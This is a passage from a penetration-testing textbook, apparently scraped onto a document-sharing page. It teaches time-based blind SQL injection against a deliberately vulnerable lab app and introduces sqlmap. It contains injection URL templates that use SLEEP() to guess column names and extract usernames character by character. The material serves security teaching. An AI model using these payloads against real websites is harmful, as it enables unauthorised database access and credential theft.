Ethical Hacking and Penetration Testing Guide



Yüklə 22,44 Mb.
Pdf görüntüsü
səhifə219/235
tarix07.08.2023
ölçüsü22,44 Mb.
#138846
1   ...   215   216   217   218   219   220   221   222   ...   235
Ethical Hacking and Penetration Testing Guide ( PDFDrive )

Guessing the Columns
Now since we have figured out that a “user” table exists in the database, we will try guessing the 
columns.
Syntax
http://192.168.75.147/peruggia/index.php?action=comment&pic_id=13&pic_id=13 and 
IF(SUBSTRING((select substring(concat(1,[guess_your_column_name]),1,1) from [existing_
table_name] limit 0,1),1,1)=1,SLEEP(5),1)--


Web Hacking
◾ 
365
From this screenshot, we can conclude that the password column exists in the database.
Extracting Data from Columns
Finally, we will try to enumerate the data present in the columns, again one character a time. 
Along with the password column, there also exists a username column, so we will try to enumerate 
the username; you can do the same with the password. The syntax is as follows:
Syntax
http://192.168.75.147/peruggia/index.php?action=comment&pic_id=13&pic_id=13 and if((select 
mid(column_name,1,1) from table_name limit 0,1)=’a’,sleep(5),1)--


366
◾ 
Ethical Hacking and Penetration Testing Guide
From this screenshot, you can see that our first query succeeded and the first character of the 
username is “a”; the second query failed since the second character is not “a”. In this way, we can 
extract the entire username, “admin”. I will leave extracting the password to you.
Automating SQL Injections with Sqlmap
We talked about many types of SQL injection vulnerabilities and how to exploit them. You might 
have realized by now that exploiting SQL injection sometimes can be a very tedious task; there-
fore, a better option is to use automated tools such as sqlmap.
Sqlmap is one of the best tools for exploiting SQL injection vulnerabilities. It supports many 
databases and helps us not only to enumerate and extract database but also to execute system com-
mands. I will discuss the basics of sqlmap and leave the rest for you to explore, since it includes a 
huge list of functions, which cannot be explained here. 
We will use the same vulnerable application that was used for demonstrating UNION-based 
and Boolean-based SQL injection.
Sqlmap can be found in the 
/pentest/database/sqlmap
directory in BackTrack 5 R3. 
This might differ based on what version of BackTrack you are using. You can use the locate com-
mand to search for sqlmap. Once in the directory, execute the following command to launch the 
sqlmap help menu.

Yüklə 22,44 Mb.

Dostları ilə paylaş:
1   ...   215   216   217   218   219   220   221   222   ...   235




Verilənlər bazası müəlliflik hüququ ilə müdafiə olunur ©azkurs.org 2024
rəhbərliyinə müraciət

gir | qeydiyyatdan keç
    Ana səhifə


yükləyin